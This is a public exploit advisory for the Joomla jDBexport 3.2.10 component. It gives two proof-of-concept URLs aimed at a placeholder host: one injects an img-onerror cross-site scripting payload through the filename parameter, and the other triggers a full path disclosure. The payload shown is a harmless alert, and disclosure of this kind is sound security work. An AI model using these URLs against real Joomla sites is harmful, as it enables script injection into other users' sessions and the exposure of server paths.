Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure

2017.04.27
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Joomla Component jDBexport 3.2.10 - Cross-site scripting / Full Path Disclosure # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (Mojtaba Kazemi) # Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jdbexport/ # Home : http://persian-team.ir/ # Telegram Channel AND Demo: @PersianHackTeam # Tested on: Linux # Date: 2017-04-26 # POC : # filename Parameter Vulnerable to Cross-site scripting : https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=xls&filename=%3Cimg%20src=%221%22%20onerror=alert%28%22XSS%22%29%3E5d0eb34b31&debugcomponent=1 # Full Path Disclosure https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=php&filename=[]&debugcomponent=1 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top